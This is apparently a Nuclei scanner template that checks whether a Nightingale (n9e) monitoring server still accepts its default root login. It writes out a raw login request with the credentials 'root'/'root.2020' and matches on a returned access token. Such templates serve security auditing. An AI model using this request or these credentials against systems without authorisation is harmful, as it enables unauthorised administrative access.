id: Nightingale-DefaultPassword
info:
  name: Nightingale-DefaultPassword
  author: lemonlove7
  severity: high
http:
  - raw:
      - |-
        POST /api/n9e/auth/login HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 42
        X-Language: zh
        Authorization: Bearer
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
        Accept: application/json
        Content-Type: application/json;charset=UTF-8
        Accept-Encoding: gzip, deflate, br
        Accept-Language: zh-CN,zh;q=0.9
        Connection: keep-alive
        
        {"username":"root","password":"root.2020"}
    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: body
        words:
          - '"access_token":'
          - '"create_by":"'
    matchers-condition: and
